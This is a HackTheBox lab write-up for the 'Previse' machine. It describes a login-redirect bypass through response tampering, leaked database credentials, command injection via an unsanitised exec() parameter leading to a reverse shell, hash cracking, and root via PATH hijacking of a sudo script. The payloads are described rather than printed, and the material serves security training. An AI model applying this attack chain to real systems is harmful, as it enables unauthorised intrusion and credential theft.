HackTheBox Writeup — Previse
Hello Guys , I am Faisal Husaini. My username on HTB is “fa1sal” . Also join me on discord.
The IP of this box is 10.10.11.104
Port Scan / Enumeration
nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.104
Way to User
Checking the web, we get redirected to a login page
Running Gobuster scan against the web server leads us to multiple files with 302 status codes
Trying to each on of them redirects back to the login page as usual, so intercepting the request for accounts.php file
Intercepting the response to the request and finding that it redirects to login.php page as well
Changing the status code from 302 Found to 200 OK in the response and forwarding the request
The login page redirection was successfully bypassed and then got access to the accounts.php page for that particular request and it can be seen that a new user can be registered from the page
Adding a new user and then intercepting the request once again
Intercepting the response to the request once again and changing the status code to be able to register the user instead of getting redirected back to the login page
To avoid manually doing all these steps, we can add a match and replace in the burp settings for all of the pages
My new user is created successfullly
After login with my new user, I can access some more functionalities of the web page, interesting one being the Files section where the site backup file can be found for download
Getting the site backup file to my local machine and then unzipping it
One of the files named config.php leads to database credentials but at the moment these credentials cannot be used anywhere with no access
Another file named logs.php leads to something interesting as it uses the exec function without any sanitization and accepts a post parameter named delim inside it
Intercepting the request of logs.php file in the web
Changing the request from GET to POST and adding the delim parameter with the value of ping back command to our local machine
TCPDump command confirms the command execution as we get pinged back
Changing the value to the payload of reverse shell this time
Getting reverse shell successfully on my netcat listener
Finding the user flag on the home folder of m4lwhere user
Checking for locally open ports, we can see that port for mysql database is open
So using the credentials we got before from config.php to login into the database as root user
Dumping the user and its hashes successfully from the database
Using John to crack the hash of the user m4lwhere successfully
Switching to the new user using the su command
Way to Root
Running sudo -l command, we can see that the user m4lwhere can run sudo on access_backup.sh file
Checking the contents of the file, we can see that it is running gzip command and also execute the date command as well, since the path of both the commands are not specified, it makes them both vulnerable to path hijacking
So first I am changing the PATH environment variable to the current user’s home directory
Creating a file called as date and adding my reverse shell payload inside it and making the file fully executable
Running the script with sudo privileges leads us to reverse shell as root on my netcat listener successfully
The root flag is found on the /root directory
